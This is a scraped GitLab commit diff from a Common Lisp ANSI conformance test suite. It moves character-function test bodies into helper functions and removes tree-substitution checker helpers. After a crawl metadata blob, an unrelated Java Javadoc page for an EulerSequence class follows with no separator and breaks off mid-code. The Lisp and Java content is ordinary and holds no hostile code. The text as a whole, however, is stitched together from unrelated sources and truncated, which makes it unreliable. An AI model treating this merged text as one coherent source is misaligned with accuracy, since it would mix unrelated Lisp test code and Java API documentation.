[ "### Moved many functions off into compiled aux files. Added tests for error...\n\n`Moved many functions off into compiled aux files. Added tests for error handling in C*R functions. Added a test of NCONC on dotted lists. Uncommented APPEND-6 and made it run fast enough on CMUCL.`\nparent 3df83b3e\nThis diff is collapsed.\n ... ... @@ -38,5 +38,233 @@ (every #'identity (cdr args))) (t (every #'not (cdr args))))) ;;; From character.lsp (defun char-type-error-check (fn) (loop for x in *universe* always (or (characterp x) (eqt (catch-type-error (funcall fn x)) 'type-error)))) (defun standard-char.5.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'standard-char) (not (standard-char-p c))))))) (defun extended-char.3.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'extended-char) (typep c 'base-char)))))) (defun character.1.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (let ((s (string c))) (and (eqlt (character c) c) (eqlt (character s) c) (eqlt (character (make-symbol s)) c))))))) (defun character.2.body () (loop for x in *universe* when (not (or (characterp x) (and (stringp x) (eqlt (length x) 1)) (and (symbolp x) (eqlt (length (symbol-name x)) 1)) (let ((c (catch-type-error (character x)))) (or (eqlt c 'type-error) (let ((s (catch-type-error (string x)))) (and (stringp s) (eqlt (char s 0) c))))))) do (return x))) (defun characterp.2.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (characterp c))))) (defun characterp.3.body () (loop for x in *universe* always (let ((p (characterp x)) (q (typep x 'character))) (if p (not (not q)) (not q))))) (defun alphanumericp.4.body () (loop for x in *universe* always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x)))))) (defun alphanumericp.5.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x)))))) (defun digit-char.1.body () (loop for r from 2 to 36 always (loop for i from 0 to 36 always (let ((c (digit-char i r))) (if (>= i r) (null c) (eqlt c (char +extended-digit-chars+ i))))))) (defun digit-char-p.1.body () (loop for x in *universe* always (not (and (characterp x) (not (alphanumericp x)) (digit-char-p x))))) (defun digit-char-p.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (not (and (not (alphanumericp x)) (digit-char-p x)))))) (defun digit-char-p.3.body () (loop for r from 2 to 35 always (loop for i from r to 35 for c = (char +extended-digit-chars+ i) never (or (digit-char-p c r) (digit-char-p (char-downcase c) r))))) (defun digit-char-p.4.body () (loop for r from 2 to 35 always (loop for i from 0 below r for c = (char +extended-digit-chars+ i) always (and (eqlt (digit-char-p c r) i) (eqlt (digit-char-p (char-downcase c) r) i))))) (defun standard-char-p.2.body () (loop for x in *universe* always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x))))) (defun standard-char-p.2a.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x))))) (defun char-upcase.1.body () (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eqlt u x)) (eqlt u (char-upcase u))))))) (defun char-upcase.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eqlt u x)) (eqlt u (char-upcase u))))))) (defun char-downcase.1.body () (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eqlt u x)) (eqlt u (char-downcase u))))))) (defun char-downcase.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eqlt u x)) (eqlt u (char-downcase u))))))) (defun both-case-p.1.body () (loop for x in *universe* always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x))))))) (defun both-case-p.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x))))))) (defun char-code.2.body () (loop for i from 0 below (min 65536 char-code-limit) for c = (code-char i) always (or (not c) (eqlt (char-code c) i)))) (defun char-int.2.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (let ((c->i (make-hash-table :test #'equal)) (i->c (make-hash-table :test #'eql))) (flet ((%insert (c) (or (not (characterp c)) (let* ((i (char-int c)) (j (gethash c c->i)) (d (gethash i i->c))) (and (or (null j) (eqlt j i)) (or (null d) (char= c d)) (progn (setf (gethash c c->i) i) (setf (gethash i i->c) c) t)))))) (and (loop for i from 0 below char-code-limit always (%insert (code-char i))) (every #'%insert +standard-chars+) (every #'%insert *universe*) t)))) (defun char-name.1.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (flet ((%check (c) (or (not (characterp c)) (let ((name (char-name c))) (or (null name) (and (stringp name) (eqlt c (name-char name)))))))) (and (loop for i from 0 below char-code-limit always (%check (code-char i))) (every #'%check +standard-chars+) (every #'%check *universe*) t))) (defun name-char.1.body () (loop for x in *universe* for s = (catch-type-error (string x)) always (or (eqlt s 'type-error) (let ((c (name-char x))) (or (not c) (characterp c) (string-equal (char-name c) s)))))) \\ No newline at end of file\n ... ... @@ -5,11 +5,6 @@ (in-package :cl-test) (defun char-type-error-check (fn) (loop for x in *universe* always (or (characterp x) (eqt (catch-type-error (funcall fn x)) 'type-error)))) (deftest character-class.1 (subtypep* 'character t) t t) ... ... @@ -43,10 +38,7 @@ t) (deftest standard-char.5 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'standard-char) (not (standard-char-p c)))))) (standard-char.5.body) t) (deftest extended-char.1 ... ... @@ -58,35 +50,17 @@ t t) (deftest extended-char.3 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'extended-char) (typep c 'base-char))))) (extended-char.3.body) t) ;;; (deftest character.1 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (let ((s (string c))) (and (eql (character c) c) (eql (character s) c) (eql (character (make-symbol s)) c)))))) (character.1.body) t) (deftest character.2 (loop for x in *universe* when (not (or (characterp x) (and (stringp x) (eql (length x) 1)) (and (symbolp x) (eql (length (symbol-name x)) 1)) (let ((c (catch-type-error (character x)))) (or (eql c 'type-error) (let ((s (catch-type-error (string x)))) (and (stringp s) (eql (char s 0) c))))))) do (return x)) (character.2.body) nil) (deftest characterp.1 ... ... @@ -94,16 +68,11 @@ t) (deftest characterp.2 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (characterp c)))) (characterp.2.body) t) (deftest characterp.3 (loop for x in *universe* always (let ((p (characterp x)) (q (typep x 'character))) (if p (not (not q)) (not q)))) (characterp.3.body) t) (deftest alpha-char-p.1 ... ... @@ -138,30 +107,15 @@ (deftest alphanumericp.4 (loop for x in *universe* always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x))))) (alphanumericp.4.body) t) (deftest alphanumericp.5 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x))))) (alphanumericp.5.body) t) (deftest digit-char.1 (loop for r from 2 to 36 always (loop for i from 0 to 36 always (let ((c (digit-char i r))) (if (>= i r) (null c) (eql c (char +extended-digit-chars+ i)))))) (digit-char.1.body) t) (deftest digit-char.2 ... ... @@ -172,36 +126,19 @@ nil nil nil nil nil nil nil nil nil nil)) (deftest digit-char-p.1 (loop for x in *universe* always (not (and (characterp x) (not (alphanumericp x)) (digit-char-p x)))) (digit-char-p.1.body) t) (deftest digit-char-p.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (not (and (not (alphanumericp x)) (digit-char-p x))))) (digit-char-p.2.body) t) (deftest digit-char-p.3 (loop for r from 2 to 35 always (loop for i from r to 35 for c = (char +extended-digit-chars+ i) never (or (digit-char-p c r) (digit-char-p (char-downcase c) r)))) (digit-char-p.3.body) t) (deftest digit-char-p.4 (loop for r from 2 to 35 always (loop for i from 0 below r for c = (char +extended-digit-chars+ i) always (and (eql (digit-char-p c r) i) (eql (digit-char-p (char-downcase c) r) i)))) (digit-char-p.4.body) t) (deftest digit-char-p.5 ... ... @@ -214,12 +151,12 @@ (deftest digit-char-p.6 (loop for i from 0 below 10 for c = (char +extended-digit-chars+ i) always (eql (digit-char-p c) i)) always (eqlt (digit-char-p c) i)) t) (deftest graphic-char-p.1 (loop for c across +standard-chars+ always (if (eql c #\\Newline) always (if (eqlt c #\\Newline) (not (graphic-char-p c)) (graphic-char-p c))) t) ... ... @@ -240,18 +177,11 @@ t) (deftest standard-char-p.2 (loop for x in *universe* always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x)))) (standard-char-p.2.body) t) (deftest standard-char-p.2a (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x)))) (standard-char-p.2a.body) t) (deftest standard-char-p.3 ... ... @@ -259,24 +189,11 @@ t) (deftest char-upcase.1 (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eql u x)) (eql u (char-upcase u)))))) (char-upcase.1.body) t) (deftest char-upcase.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eql u x)) (eql u (char-upcase u)))))) (char-upcase.2.body) t) (deftest char-upcase.3 ... ... @@ -288,24 +205,11 @@ t) (deftest char-downcase.1 (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eql u x)) (eql u (char-downcase u)))))) (char-downcase.1.body) t) (deftest char-downcase.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eql u x)) (eql u (char-downcase u)))))) (char-downcase.2.body) t) (deftest char-downcase.3 ... ... @@ -345,26 +249,11 @@ t) (deftest both-case-p.1 (loop for x in *universe* always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x)))))) (both-case-p.1.body) t) (deftest both-case-p.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x)))))) (both-case-p.2.body) t) (deftest both-case-p.3 ... ... @@ -376,70 +265,23 @@ t) (deftest char-code.2 (loop for i from 0 below (min 65536 char-code-limit) for c = (code-char i) always (or (not c) (eql (char-code c) i))) (char-code.2.body) t) (deftest code-char.1 (loop for x across +standard-chars+ always (eql (code-char (char-code x)) x)) always (eqlt (code-char (char-code x)) x)) t) (deftest char-int.1 (loop for x across +standard-chars+ always (eql (char-int x) (char-code x))) t) (defun char-int.2.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (let ((c->i (make-hash-table :test #'equal)) (i->c (make-hash-table :test #'eql))) (flet ((%insert (c) (or (not (characterp c)) (let* ((i (char-int c)) (j (gethash c c->i)) (d (gethash i i->c))) (and (or (null j) (eql j i)) (or (null d) (char= c d)) (progn (setf (gethash c c->i) i) (setf (gethash i i->c) c) t)))))) (and (loop for i from 0 below char-code-limit always (%insert (code-char i))) (every #'%insert +standard-chars+) (every #'%insert *universe*) t)))) (eval-when (load eval) (compile 'char-int.2.fn)) always (eqlt (char-int x) (char-code x))) t) (deftest char-int.2 (char-int.2.fn) t) (defun char-name.1.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (flet ((%check (c) (or (not (characterp c)) (let ((name (char-name c))) (or (null name) (and (stringp name) (eql c (name-char name)))))))) (and (loop for i from 0 below char-code-limit always (%check (code-char i))) (every #'%check +standard-chars+) (every #'%check *universe*) t))) (eval-when (load eval) (compile 'char-name.1.fn)) (deftest char-name.1 (char-name.1.fn) t) ... ... @@ -475,19 +317,7 @@ t) (deftest name-char.1 (funcall (compile nil '(lambda () (declare (safety 3) (speed 1) (space 1)) (notnot (loop for x in *universe* for s = (catch-type-error (string x)) always (or (eql s 'type-error) (let ((c (name-char x))) (or (not c) (characterp c) (string-equal (char-name c) s))))))))) (name-char.1.body) t) (deftest name-char.2 ... ... @@ -498,5 +328,5 @@ (c2 (name-char (string-downcase s))) (c3 (name-char (string-capitalize s))) (c4 (name-char s))) (and (eql c1 c2) (eql c2 c3) (eql c3 c4)))) (and (eqlt c1 c2) (eqlt c2 c3) (eqlt c3 c4)))) t)\n ... ... @@ -322,7 +322,6 @@ (cddddr *cons-test-4*) p) ;; Test rplaca, rplacd (deftest rplaca-1 ... ...\n ... ... @@ -11,18 +11,6 @@ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; copy-tree (defun check-cons-copy (x y) \"Check that the tree x is a copy of the tree y, returning t iff it is.\" (cond ((consp x) (and (consp y) (not (eqt x y)) (check-cons-copy (car x) (car y)) (check-cons-copy (cdr x) (cdr y)))) ((eqt x y) t) (t nil))) ;; Try copy-tree on a tree containing elements of various kinds (deftest copy-tree-1 (let ((x (cons 'a (list (cons 'b 'c) ... ... @@ -41,26 +29,6 @@ (check-cons-copy x y))) t) ;; Check sublis (defun check-sublis (a al &key (key 'no-key) test test-not) \"Apply sublis al a with various keys. Check that the arguments are not themselves changed. Return nil if the arguments do get changed.\" (setf a (copy-tree a)) (setf al (copy-tree al)) (let ((acopy (make-scaffold-copy a)) (alcopy (make-scaffold-copy al))) (let ((as (apply #'sublis al a `(,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not)) ,@(unless (eqt key 'no-key) `(:key ,key)))))) (and (check-scaffold-copy a acopy) (check-scaffold-copy al alcopy) as)))) (deftest sublis-1 (check-sublis '((a b) g (d e 10 g h) 15 . g) '((e . e2) (g . 17))) ... ... @@ -121,18 +89,6 @@ ;; nsublis (defun check-nsublis (a al &key (key 'no-key) test test-not) \"Apply nsublis al a, copying these arguments first.\" (setf a (copy-tree a)) (setf al (copy-tree al)) (let ((as (apply #'sublis (copy-tree al) (copy-tree a) `(,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not)) ,@(unless (eqt key 'no-key) `(:key ,key)))))) as)) (deftest nsublis-1 (check-nsublis '((a b) g (d e 10 g h) 15 . g) '((e . e2) (g . 17))) ... ... @@ -197,29 +153,6 @@ (check-sublis a '((a . b) (b . a)))) ((b a) (b a))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check subst (defun check-subst (new old tree &key (key 'no-key) test test-not) \"Call subst new old tree, with keyword arguments if present. Check that the arguments are not changed.\" (setf new (copy-tree new)) (setf old (copy-tree old)) (setf tree (copy-tree tree)) (let ((newcopy (make-scaffold-copy new)) (oldcopy (make-scaffold-copy old)) (treecopy (make-scaffold-copy tree))) (let ((result (apply #'subst new old tree `(,@(unless (eqt key 'no-key) `(:key ,key)) ,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not)))))) (and (check-scaffold-copy new newcopy) (check-scaffold-copy old oldcopy) (check-scaffold-copy tree treecopy) result)))) (defvar *subst-tree-1* '(10 (30 20 10) (20 10) (10 20 30 40))) (deftest subst-1 ... ... @@ -276,42 +209,6 @@ :key nil) (a a c d a a)) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check subst-if, subst-if-not (defun check-subst-if (new pred tree &key (key 'no-key)) \"Call subst-if new pred tree, with various keyword arguments if present. Check that the arguments are not changed.\" (setf new (copy-tree new)) (setf tree (copy-tree tree)) (let ((newcopy (make-scaffold-copy new)) (predcopy (make-scaffold-copy pred)) (treecopy (make-scaffold-copy tree))) (let ((result (apply #'subst-if new pred tree (unless (eqt key 'no-key) `(:key ,key))))) (and (check-scaffold-copy new newcopy) (check-scaffold-copy pred predcopy) (check-scaffold-copy tree treecopy) result)))) (defun check-subst-if-not (new pred tree &key (key 'no-key)) \"Call subst-if-not new pred tree, with various keyword arguments if present. Check that the arguments are not changed.\" (setf new (copy-tree new)) (setf tree (copy-tree tree)) (let ((newcopy (make-scaffold-copy new)) (predcopy (make-scaffold-copy pred)) (treecopy (make-scaffold-copy tree))) (let ((result (apply #'subst-if-not new pred tree (unless (eqt key 'no-key) `(:key ,key))))) (and (check-scaffold-copy new newcopy) (check-scaffold-copy pred predcopy) (check-scaffold-copy tree treecopy) result)))) (deftest subst-if-1 (check-subst-if 'a #'consp '((100 1) (2 3) (4 3 2 1) (a b c))) A) ... ... @@ -384,19 +281,6 @@ :key nil) ((a) (a) (c) (d))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check nsubst (defun check-nsubst (new old tree &key (key 'no-key) test test-not) \"Call nsubst new old tree, with keyword arguments if present.\" (setf new (copy-tree new)) (setf old (copy-tree old)) (setf tree (copy-tree tree)) (apply #'nsubst new old tree `(,@(unless (eqt key 'no-key) `(:key ,key)) ,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not))))) (defvar *nsubst-tree-1* '(10 (30 20 10) (20 10) (10 20 30 40))) (deftest nsubst-1 ... ... @@ -454,23 +338,6 @@ (a a c d a a)) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check nsubst-if, nsubst-if-not (defun check-nsubst-if (new pred tree &key (key 'no-key)) \"Call nsubst-if new pred tree, with keyword arguments if present.\" (setf new (copy-tree new)) (setf tree (copy-tree tree)) (apply #'nsubst-if new pred tree (unless (eqt key 'no-key) `(:key ,key))))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9338403,"math_prob":0.918777,"size":319,"snap":"2020-10-2020-16","text_gpt3_token_len":77,"char_repetition_ratio":0.13333334,"word_repetition_ratio":0.2857143,"special_character_ratio":0.21316615,"punctuation_ratio":0.140625,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99396354,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-03T00:20:07Z\",\"WARC-Record-ID\":\"<urn:uuid:d4117264-c278-4980-b828-ae4117691bee>\",\"Content-Length\":\"1049648\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:07cc753c-06b0-4956-a1cb-6c1237a93547>\",\"WARC-Concurrent-To\":\"<urn:uuid:14a6582b-ffde-4515-9ac7-d07276d22b8f>\",\"WARC-IP-Address\":\"148.251.248.130\",\"WARC-Target-URI\":\"https://gitlab.common-lisp.net/gpalter/ansi-test/commit/2f8353ca0fd1b428cc32758854ebfe65fca26d47\",\"WARC-Payload-Digest\":\"sha1:H3DEFPXQEBQ6GQDG776CEJNO6F5MNAGZ\",\"WARC-Block-Digest\":\"sha1:TW6SFINVQIXAJECJC6OFYKN77KMXVHCK\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370509103.51_warc_CC-MAIN-20200402235814-20200403025814-00056.warc.gz\"}"}
https://doc.cgal.org/4.14/AABB_tree/classAABBRayIntersectionTraits.html
[ "", null, "CGAL 4.14 - 3D Fast Intersection and Distance Computation (AABB Tree)\nAABBRayIntersectionTraits Concept Reference\n\n## Definition\n\nThe concept AABBRayIntersectionTraits is a refinement of the concept AABBTraits. In addition to the types and functions required by AABBTraits it also requires function objects to calculate the distance of an intersection along a ray.\n\nHas Models:\nCGAL::AABB_traits<AABBGeomTraits,AABBPrimitive>\nCGAL::AABB_traits<AABBGeomTraits,AABBPrimitive>\nCGAL::AABB_tree<AABBTraits>\nAABBPrimitive\n\n## Public Types\n\ntypedef unspecified_type Ray_3\nType of a 3D ray.\n\ntypedef unspecified_type Intersection_distance\nA functor object to compute the distance between the source of a ray and its closest intersection point between the ray and a primitive or a bounding box. More...\n\n## Public Member Functions\n\nIntersection_distance intersection_distance_object () const\nReturns the intersection distance functor.\n\n## ◆ Intersection_distance\n\nA functor object to compute the distance between the source of a ray and its closest intersection point between the ray and a primitive or a bounding box.\n\nAn empty boost::optional is returned, if there is no intersection. When there is an intersection, an object of type FT is returned such that if i1 and i2 are two intersection points, then i1 is closer to the source of the ray than i2 iff n1 < n2, n1 and n2 being the numbers returned for i1 and i2 respectively.\n\nProvides the operators: boost::optional<FT> operator()(const Ray_3& r, const Bounding_box& bbox). boost::optional<std::pair<FT, Intersection_and_primitive_id<Ray_3>::Type > > operator()(const Ray_3& r, const Primitive& primitive).\n\nA common algorithm to compute the intersection between a bounding box and a ray is the slab method." ]
[ null, "https://doc.cgal.org/4.14/Manual/search/mag_sel.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8196511,"math_prob":0.96041465,"size":1512,"snap":"2022-05-2022-21","text_gpt3_token_len":355,"char_repetition_ratio":0.16445623,"word_repetition_ratio":0.20627803,"special_character_ratio":0.21693122,"punctuation_ratio":0.124060154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9690864,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T06:59:37Z\",\"WARC-Record-ID\":\"<urn:uuid:90dcc6f7-f8ca-4d64-86ee-249170e4f1e6>\",\"Content-Length\":\"15112\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:57f25291-7fa8-41a6-986c-0615df790df3>\",\"WARC-Concurrent-To\":\"<urn:uuid:7ed6c723-0c4e-4dc3-85b4-237ec7aa5f12>\",\"WARC-IP-Address\":\"213.186.33.40\",\"WARC-Target-URI\":\"https://doc.cgal.org/4.14/AABB_tree/classAABBRayIntersectionTraits.html\",\"WARC-Payload-Digest\":\"sha1:PAWYHZJT2OA3XU26K5GRILSR4KXKCFMH\",\"WARC-Block-Digest\":\"sha1:6N4K73IIAOUDUKETTKVSKCNXCK6B36VP\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662604495.84_warc_CC-MAIN-20220526065603-20220526095603-00665.warc.gz\"}"}
https://www.boost.org/doc/libs/1_76_0/libs/mpl/doc/refmanual/replace.html
[ "#", null, "Boost C++ Libraries\n\n...one of the most highly regarded and expertly designed C++ library projects in the world.\n\n |  |  | Full TOC Front Page / Algorithms / Transformation Algorithms / replace\n\n# replace\n\n### Synopsis\n\n```template<\ntypename Sequence\n, typename OldType\n, typename NewType\n, typename In = unspecified\n>\nstruct replace\n{\ntypedef unspecified type;\n};\n```\n\n### Description\n\nReturns a copy of the original sequence where every type identical to OldType has been replaced with NewType.\n\n[Note: This wording applies to a no-inserter version(s) of the algorithm. See the Expression semantics subsection for a precise specification of the algorithm's details in all cases — end note]\n\n```#include <boost/mpl/replace.hpp>\n```\n\n### Model of\n\nReversible Algorithm\n\n### Parameters\n\nParameter Requirement Description\nSequence Forward Sequence A original sequence.\nOldType Any type A type to be replaced.\nNewType Any type A type to replace with.\nIn Inserter An inserter.\n\n### Expression semantics\n\nThe semantics of an expression are defined only where they differ from, or are not defined in Reversible Algorithm.\n\nFor any Forward Sequence s, an Inserter in, and arbitrary types x and y:\n\n```typedef replace<s,x,y,in>::type r;\n```\nReturn type: A type. Equivalent to ```typedef replace_if< s,y,is_same<_,x>,in >::type r; ```\n\n### Complexity\n\nLinear. Performs exactly size<s>::value comparisons for identity / insertions.\n\n### Example\n\n```typedef vector<int,float,char,float,float,double> types;\ntypedef vector<int,double,char,double,double,double> expected;\ntypedef replace< types,float,double >::type result;\n\nBOOST_MPL_ASSERT(( equal< result,expected > ));\n```" ]
[ null, "https://www.boost.org/gfx/space.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6170444,"math_prob":0.6575001,"size":1521,"snap":"2022-27-2022-33","text_gpt3_token_len":351,"char_repetition_ratio":0.12722479,"word_repetition_ratio":0.009756098,"special_character_ratio":0.22419462,"punctuation_ratio":0.21678321,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95976174,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T19:57:01Z\",\"WARC-Record-ID\":\"<urn:uuid:5766ac36-9550-4ee0-8573-1c12ab78ca31>\",\"Content-Length\":\"10569\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5f896070-71da-477c-94a9-91b0697a0e0a>\",\"WARC-Concurrent-To\":\"<urn:uuid:87cda664-5281-4d6f-9077-268e18c8b7ba>\",\"WARC-IP-Address\":\"146.20.110.251\",\"WARC-Target-URI\":\"https://www.boost.org/doc/libs/1_76_0/libs/mpl/doc/refmanual/replace.html\",\"WARC-Payload-Digest\":\"sha1:Q5F7SQLQ52TI3CNDLKF7X7KFQFMSLQOF\",\"WARC-Block-Digest\":\"sha1:YI4D2CUCPV3FWCG272E5FFLSLH77T7U2\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104597905.85_warc_CC-MAIN-20220705174927-20220705204927-00021.warc.gz\"}"}
https://docs.scipy.org/doc/scipy-1.6.1/reference/generated/scipy.interpolate.UnivariateSpline.get_residual.html
[ "# scipy.interpolate.UnivariateSpline.get_residual¶\n\nUnivariateSpline.get_residual(self)[source]\n\nReturn weighted sum of squared residuals of the spline approximation.\n\nThis is equivalent to:\n\nsum((w[i] * (y[i]-spl(x[i])))**2, axis=0)\n\n\n#### Previous topic\n\nscipy.interpolate.UnivariateSpline.get_knots\n\n#### Next topic\n\nscipy.interpolate.UnivariateSpline.integral" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6146314,"math_prob":0.8402605,"size":272,"snap":"2021-21-2021-25","text_gpt3_token_len":70,"char_repetition_ratio":0.1641791,"word_repetition_ratio":0.0,"special_character_ratio":0.20588236,"punctuation_ratio":0.22916667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9777464,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-11T06:31:26Z\",\"WARC-Record-ID\":\"<urn:uuid:484c54dc-c8c2-4e3c-a6d0-839b832c4317>\",\"Content-Length\":\"7471\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:686bd9e6-f278-416d-83fc-8fca8bc9799c>\",\"WARC-Concurrent-To\":\"<urn:uuid:a1246dac-9280-4470-93cc-db13940211a2>\",\"WARC-IP-Address\":\"50.17.248.72\",\"WARC-Target-URI\":\"https://docs.scipy.org/doc/scipy-1.6.1/reference/generated/scipy.interpolate.UnivariateSpline.get_residual.html\",\"WARC-Payload-Digest\":\"sha1:I3E6LLRK72OK6CGXTETFG44XU7THICEM\",\"WARC-Block-Digest\":\"sha1:LECW4SCMU6GAFXU4ATTRCMEQDOSJOVZJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991904.6_warc_CC-MAIN-20210511060441-20210511090441-00346.warc.gz\"}"}
https://help.agi.com/STKComponentsJava/Javadoc/agi-foundation-coordinates-EulerSequence.html
[ "agi.foundation.coordinates\n(agi.foundation.core-2023r1.jar)\n\n## Class EulerSequence\n\n• All Implemented Interfaces:\nIEquatable<EulerSequence>, ImmutableValueType, ValueType, IEquatableEpsilon<EulerSequence>\n\n```public final class EulerSequence\nextends Object\nimplements IEquatable<EulerSequence>, IEquatableEpsilon<EulerSequence>, ImmutableValueType```\n\nRepresents a rotation as a sequence of three `ElementaryRotations` about consecutive axes. The first elementary rotation results in an intermediate orientation and associated set of axes from which the second elementary rotation is performed. Likewise, the third elementary rotation is performed from the intermediate orientation and set of axes which result from the second rotation.\n\nA 321 Euler sequence is commonly used to represent yaw about the z-axis, followed by pitch about the resulting y-axis, and then roll about the resulting x-axis when expressing the attitude of a vehicle relative to some reference orientation.\n\nA 321 Euler sequence can be used to express the yaw (heading), pitch (elevation), and roll (bank) orientation of the vehicle body axis relative to the local `North-East-Down` axes of the vehicle. To obtain these angles, use a 321 `EulerSequence` as shown below:\n\n``````Point myVehiclePoint = propagator.createPoint();\nEarthCentralBody earth = CentralBodiesFacet.getFromContext().getEarth();\nAxesNorthEastDown ned = new AxesNorthEastDown(earth, myVehiclePoint);\nVector surfaceNormal = new VectorEllipsoidSurfaceNormal(earth.getShape(), earth.getFixedFrame(), myVehiclePoint);\nAxesAlignedConstrained vehicleBodyAxes = new AxesAlignedConstrained(\nnew VectorVelocity(myVehiclePoint, earth.getFixedFrame()), AxisIndicator.FIRST,\nnew VectorInverted(surfaceNormal), AxisIndicator.THIRD);\n\nAxesEvaluator rotationEvaluator = GeometryTransformer.getAxesTransformation(ned, vehicleBodyAxes);\n\nUnitQuaternion ned2body = rotationEvaluator.evaluate(propagator.getTimeInterval().getStart());\n\nEulerSequence yawPitchRoll = new EulerSequence(ned2body, 